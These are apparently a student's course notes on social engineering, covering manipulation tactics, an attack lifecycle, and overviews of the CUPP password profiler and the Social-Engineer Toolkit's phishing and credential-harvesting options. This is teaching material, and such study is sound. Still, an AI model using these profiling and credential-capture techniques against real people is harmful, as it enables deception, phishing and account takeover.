Week 8

#cybersecurity #infosec #learning #security

Social Engineering (Session 8 Notes)

The Psychology of the Attack

Social engineering focuses heavily on human psychology, mapping human senses into sight, hearing, taste, touch, smell, balance and acceleration, temperature, kinesthetic, pain, and direction. The primary goal of these methods is to obtain confidential information through human communication. This approach relies fundamentally on establishing a relationship of "trust" with the victim.

Two common tactics are applied to accomplish this task and guide conversations:
Interview: A structured approach used to gather initial data from a subject.
Interrogation: A more intensive, direct method applied to extract specific information from the target.

The Social Engineering Lifecycle

An effective social engineering engagement follows a clearly defined, iterative four-stage attack process:
[ Intelligence gathering ] --> [ Identifying vulnerable points ] --> [ Planning the Attack ] --> [ Execution ]

Intelligence gathering: Collecting open-source background data regarding the target organization or individual.
Identifying vulnerable points: Analyzing the gathered intelligence to isolate human, technical, or procedural weaknesses.
Planning the Attack: Designing a highly believable scenario or pretext tailored specifically to exploit those weaknesses.
Execution: Launching the designed operation to capture credentials, sensitive data, or gain initial system access.

🎭 Core Attack Methods (Psychological Triggers)

Attackers manipulate natural human biases and social constraints to bypass logical defenses using specific methods:

Impersonation: Pretending to be an authorized entity, employee, or trusted identity to deceive the victim.
Reciprocation: The art of exchanging favors in terms of getting mutual advantage, creating a psychological obligation for the victim to comply.
Influential Authority: Leveraging a real or perceived position of high status or corporate power to command compliance.
Scarcity: Creating an artificial sense of urgency or limited availability to force a rushed, unverified decision.
Social Relationship: Exploiting natural human tendencies to cooperate with people within a shared social network or established rapport.

🛠️ The Technical Toolkit

To automate and scale these psychological vectors, penetration testers use dedicated open-source utilities to profile targets and deploy credential capture systems.

1. Common User Passwords Profiler (CUPP)

The Common User Passwords Profiler (CUPP) is a profiling tool used to find valid passwords based on the target's personal, psychological, and social characteristics.

By executing the interactive command ./cupp.py -i , the tester can insert information about the victim to automatically build a highly customized password dictionary:

Name and Surname: The target's legal name identifiers (e.g., Name: Karen, Surname: Smith).
Nickname: The target's common online handle or casual name (e.g., karsmith).
Birthdate: Formatted explicitly as DDMMYYYY (e.g., 03101976).
Wife's (husband's) details: The spouse's legal name, nickname, and birthdate information.
Child's details: The child's name (e.g., Rohan) and birthdate metrics.
Pet's name: The identifier of the target's pet (e.g., Katie).

Note: If you do not know all the info, you can simply hit enter when asked to skip fields dynamically.

2. Social-Engineer Toolkit (SET)

The Social-Engineer Toolkit (SET) is an exploitation framework managed via directories like /pentest/exploits/SET/ and launched via ./set. The platform offers multiple attack options from its primary menu, including:

Automatic E-Mail Attacks: Automated options for crafting phishing email campaigns.
Website Attack Vectors: Web-based attack channels such as Java Applet Attacks, Metasploit Browser Exploits, Tabnabbing, and Web Jacking.
Credential Harvester Attack Method: A specialized web vector that utilizes clone capabilities within SET to harvest credentials or parameters from a website as well as place them into a report.